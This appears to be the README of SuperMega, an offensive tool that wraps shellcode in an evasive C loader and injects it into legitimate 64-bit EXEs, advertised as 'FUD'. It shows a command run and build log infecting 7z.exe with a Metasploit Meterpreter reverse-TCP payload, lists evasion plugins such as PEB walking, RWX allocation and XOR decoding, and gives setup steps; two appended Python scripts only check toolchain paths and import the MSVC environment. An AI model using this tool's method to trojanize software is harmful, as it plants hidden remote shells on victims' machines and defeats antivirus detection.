SuperMega - Cordyceps Implementation
Ophiocordyceps camponoti-balzani is a species of fungus that parasitizes insect hosts of the order Hymenoptera, primarily ants. O. camponoti-balzani infects ants, and eventually kills the hosts after they move to an ideal location for the fungus to spread its spores.
What
SuperMega is a shellcode loader. It takes a shellcode as input, protects it, adds a loader, and injects the resulting shellcode into an existing EXE.
FUD.
And:
- Only works with 64-bit (both the shellcode and the EXE being infected must be x64)
Features:
- Loader source is C yay
- Execution-Guardrails
- Environment variables
- configurable implementation
- different EXE injection techniques
Plugins:
- source style:
  - PEB_WALK
  - IAT_REUSE
- alloc style:
  - RWX
  - REUSE_RWX
- decoder style:
  - PLAIN_1
  - XOR_1
- dataref style:
  - APPEND
Examples
Metasploit in 7z
Inject a Metasploit Meterpreter reverse-TCP shellcode into 7z.exe. No source style is given on the command line, so PEB_WALK is used:
PS C:\repos\supermega> python.exe .\supermega.py --shellcode .\shellcodes\msf-meterpreter-reversetcp.bin --inject .\exes\7z.exe
(supermega.py) Super Mega
(helper.py ) --[ Remove old files ]
(model.py ) --( Capabilities:
(model.py ) 0x0: GetEnvironmentVariableW (b'')
(model.py ) 0x460090: VirtualAlloc (b'')
(supermega.py) --[ SourceStyle: peb_walk
(compiler.py ) --[ C to ASM: build\main.c -> build\main.asm ]
(compiler.py ) ---[ Make ASM from C: build\main.c ]
(compiler.py ) ---[ Fixup : build\main.asm ]
(compiler.py ) > Replace external reference at line: 8
(compiler.py ) > Replace external reference at line: 395
(compiler.py ) > Replace payload length at line: 389
(compiler.py ) > Add end of code label at line: 807
(compiler.py ) ---[ Cleanup: build\main.asm ]
(assembler.py) --[ Assemble to exe: build\main.asm -> build\main.exe -> build\main.bin ]
(assembler.py) ---[ Assemble ASM to EXE: build\main.asm -> build\main.exe ]
(assembler.py) ---[ EXE to SHC: build\main.exe -> build\main.bin ]
(helper.py ) --[ Code section: .text
(helper.py ) > 0x1000 Code Size: 2557 (raw code section size: 2560)
(assembler.py) --[ Merge stager: build\main.bin + .\shellcodes\msf-meterpreter-reversetcp.bin -> build\main.bin ]
(assembler.py) ---[ Size: Stager: 2557 and Payload: 449 Sum: 3006 ]
(injector.py ) --[ Injecting: build\main.bin into: .\exes\7z.exe -> .\exes\7z.infected.exe ]
(supermega.py) --[ Start infected exe ]
Directories
- shellcodes/: Input: Shellcodes we want to use as input (payload)
- source/: Input: Loader C templates
- plugins/: Input: Loader C implementations
- exes/: Input: Nonmalicious EXE files we inject into
- build/: build: Temporary files during build process
- logs/: build: Files generated by building (inspect for debugging)
- out/: output. The generated result: infected exe
Installation
Paths
Configure config.yaml with:
- Path to the Visual Studio 2022 compiler (cl.exe) and assembler (ml64.exe)
- Path to masm_shc and runshc: https://github.com/hasherezade/masm_shc
config.yaml:
path_cl: 'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\cl.exe'
path_ml64: 'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\ml64.exe'
path_masmshc: 'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\masm_shc\masm_shc.exe'
path_runshc: 'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\runshc.exe'
Make sure cl.exe and ml64.exe are the ones from the Hostx64\x64 directory
(the x64-hosted, x64-targeting toolchain). Make sure to compile
masm_shc and runshc as 64-bit. You can also replace runshc with
your own shellcode loader.
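The two requirements above (Hostx64\x64 toolchain, 64-bit masm_shc and runshc) are easy to get wrong silently, so here is an added check script. It is not part of SuperMega; it reads the four path_* keys from config.yaml with a minimal parser (no PyYAML needed), confirms each file opens, inspects the PE header's Machine field to confirm every binary is IMAGE_FILE_MACHINE_AMD64, and flags a cl.exe/ml64.exe that is not under Hostx64\x64. The fake_pe() helper only builds constructed header bytes for offline testing.

```python
"""Sanity-check the tool paths in config.yaml before running supermega.py.

Added example, not part of SuperMega itself. It verifies that the four
configured binaries exist, that cl.exe and ml64.exe come from a
Hostx64\\x64 directory, and that all four are 64-bit PE files
(IMAGE_FILE_MACHINE_AMD64), which is what the rules above require.
"""
import re
import struct

IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_MACHINE_I386 = 0x14C

# The keys supermega reads from config.yaml (names from the README above).
TOOL_KEYS = ("path_cl", "path_ml64", "path_masmshc", "path_runshc")


def parse_config(text):
    """Minimal parser for the flat `key: 'value'` lines in config.yaml.

    Only the tool-path keys are extracted, so no PyYAML dependency is needed.
    """
    paths = {}
    for line in text.splitlines():
        m = re.match(r"""^\s*(path_\w+)\s*:\s*['"]?(.*?)['"]?\s*$""", line)
        if m and m.group(1) in TOOL_KEYS:
            paths[m.group(1)] = m.group(2)
    return paths


def pe_machine(data):
    """Return the IMAGE_FILE_HEADER.Machine value of a PE image, or None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    return machine


def check_tools(paths, read_file=None):
    """Return a list of problems; an empty list means the config looks usable.

    `read_file` is injectable so the check can run without the real binaries.
    """
    if read_file is None:
        def read_file(path):
            with open(path, "rb") as f:
                return f.read(0x400)  # DOS header plus PE header fit easily
    problems = []
    for key in TOOL_KEYS:
        path = paths.get(key)
        if not path:
            problems.append(f"{key}: missing from config.yaml")
            continue
        try:
            data = read_file(path)
        except OSError as exc:
            problems.append(f"{key}: cannot open {path} ({exc})")
            continue
        machine = pe_machine(data)
        if machine != IMAGE_FILE_MACHINE_AMD64:
            problems.append(f"{key}: {path} is not a 64-bit PE (Machine=0x{machine or 0:x})")
        # MSVC ships several cross-compilers; only the Hostx64\x64 pair is a
        # 64-bit host compiler producing 64-bit code, as required above.
        if key in ("path_cl", "path_ml64") and "hostx64\\x64" not in path.lower().replace("/", "\\"):
            problems.append(f"{key}: {path} is not from the Hostx64\\x64 toolchain directory")
    return problems


def fake_pe(machine):
    """Constructed minimal PE header for offline testing (not a real binary)."""
    hdr = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", hdr, 0x3C, 0x40)  # e_lfanew: PE signature at 0x40
    hdr += b"PE\0\0" + struct.pack("<H", machine) + b"\0" * 18
    return bytes(hdr)


if __name__ == "__main__":
    import sys
    with open("config.yaml", encoding="utf-8") as f:
        found = check_tools(parse_config(f.read()))
    for p in found:
        print("PROBLEM:", p)
    sys.exit(1 if found else 0)
```

Run it from the repo root next to config.yaml; a non-zero exit with a PROBLEM line tells you which tool is 32-bit or from the wrong host directory before the build fails in a less obvious way.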
Environment Variables
The build needs the Visual Studio specific paths (INCLUDE, LIB, LIBPATH and the tool directories) as environment
variables. Either start the "Visual Studio Developer Console", or, if you are sane,
use the following command line to get the whole environment right.
Use this when the compiler fails with "Cannot find Windows.h":
cmd.exe /c "`"C:\Program Files (x86)\Microsoft Visual Studio\<year>\<edition>\Common7\Tools\VsDevCmd.bat`" && powershell"
Note that Visual Studio 2022 installs under C:\Program Files\Microsoft Visual Studio\2022\<edition>, not under Program Files (x86).
Also make sure radare2 is in path:
$Env:PATH += ";C:\Tools\radare2-5.8.8-w64\bin"
Alternative
Run
"C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat"
or the VS developer console to find the environment variables it sets, and set them in the PowerShell session you run python from. In my case:
$env:INCLUDE = "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\include;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\include;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\VS\include;C:\Program Files (x86)\Windows Kits\10\include\10.0.22621.0\ucrt;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\um;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\shared;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\winrt;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\cppwinrt;C:\Program Files (x86)\Windows Kits\NETFXSDK\4.8\include\um"
$env:LIB="C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x64;C:\Program Files (x86)\Windows Kits\NETFXSDK\4.8\lib\um\x64;C:\Program Files (x86)\Windows Kits\10\lib\10.0.22621.0\ucrt\x64;C:\Program Files (x86)\Windows Kits\10\\lib\10.0.22621.0\\um\x64"
$env:LIBPATH="C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x86\store\references;C:\Program Files (x86)\Windows Kits\10\UnionMetadata\10.0.22621.0;C:\Program Files (x86)\Windows Kits\10\References\10.0.22621.0;C:\Windows\Microsoft.NET\Framework64\v4.0.30319"
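Instead of copying INCLUDE, LIB and LIBPATH by hand as above, the same environment can be captured programmatically. The following is an added example, not SuperMega code: it runs vcvars64.bat in a child cmd.exe, parses the output of `set`, copies the needed variables into os.environ, and then checks that Windows.h is actually reachable through INCLUDE (the failure mode the previous section warns about). The vcvars64.bat location is the assumed default Community install path, and SAMPLE_SET_OUTPUT is a constructed, shortened stand-in for real `set` output so the parsing can be exercised off a Windows box.

```python
"""Import the MSVC build environment into Python instead of pasting it by hand.

Added example, not part of SuperMega. It runs vcvars64.bat in a child
cmd.exe, dumps the resulting environment with `set`, and copies the
variables the compiler needs (INCLUDE, LIB, LIBPATH, PATH) into
os.environ. find_header() then confirms Windows.h is reachable, which is
the "Cannot find Windows.h" failure described above. The vcvars64.bat
path is the default Community install location and is an assumption.
"""
import ntpath
import os
import re
import subprocess

VCVARS64 = r"C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat"
WANTED = ("INCLUDE", "LIB", "LIBPATH", "PATH")

# Constructed sample of what `set` prints after vcvars64.bat (shortened,
# for offline runs). Real output has many more variables.
SAMPLE_SET_OUTPUT = r"""
=C:=C:\
INCLUDE=C:\VS\include;C:\Kits\10\include\10.0.22621.0\um
LIB=C:\VS\lib\x64
PATH=C:\VS\bin\Hostx64\x64;C:\Windows\system32
VSCMD_ARG_TGT_ARCH=x64
"""


def parse_set_output(text):
    """Parse cmd.exe `set` output into a dict keyed by upper-cased variable name."""
    env = {}
    for line in text.splitlines():
        # Real variables look like NAME=value; cmd's hidden =C:=... drive
        # entries and any banner lines do not match and are skipped.
        if not re.match(r"^[A-Za-z_][\w()]*=", line):
            continue
        key, _, value = line.partition("=")
        env[key.upper()] = value
    return env


def capture_vcvars(vcvars_path=VCVARS64):
    """Run vcvars64.bat in a child cmd.exe and return the environment it produced."""
    # Same trick setuptools uses to locate MSVC: run the batch file, then `set`.
    cmdline = f'cmd.exe /c "{vcvars_path}" && set'
    out = subprocess.run(cmdline, capture_output=True, text=True, check=True).stdout
    return parse_set_output(out)


def apply_env(env, environ=None):
    """Copy the WANTED variables into os.environ (or `environ`); return the keys set."""
    environ = os.environ if environ is None else environ
    applied = [k for k in WANTED if k in env]
    for k in applied:
        environ[k] = env[k]
    return applied


def find_header(include_value, name="Windows.h", exists=ntpath.isfile):
    """Return the first INCLUDE directory that contains `name`, or None."""
    for d in include_value.split(";"):
        d = d.strip()
        if d and exists(ntpath.join(d, name)):
            return d
    return None


if __name__ == "__main__":
    on_windows = os.name == "nt"
    env = capture_vcvars() if on_windows else parse_set_output(SAMPLE_SET_OUTPUT)
    print("applied:", apply_env(env, None if on_windows else {}))
    print("Windows.h found in:", find_header(env.get("INCLUDE", "")))
```

Call capture_vcvars() and apply_env() at the top of a wrapper script that then invokes supermega.py, or run it in the same PowerShell session first; if find_header() returns None the Windows SDK include directory is missing from INCLUDE and cl.exe will fail on Windows.h.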
VS2022 Components
A list of packages/components which may be required for Visual Studio 2022:
- C++ 2022 Redistributable Update
- C++ Build Insights
- C++ CMake tools for Windows
- C++/CLI support for v143 build tools (latest)
- MSBuild
- MSVC v143 - VS 2022 C++ x64/x86 build tools (latest)
- C++ ATL for latest v143 build tools (x86 & x64)
- C++ MFC for latest v143 build tools (x86 & x64)
- Windows 11 SDK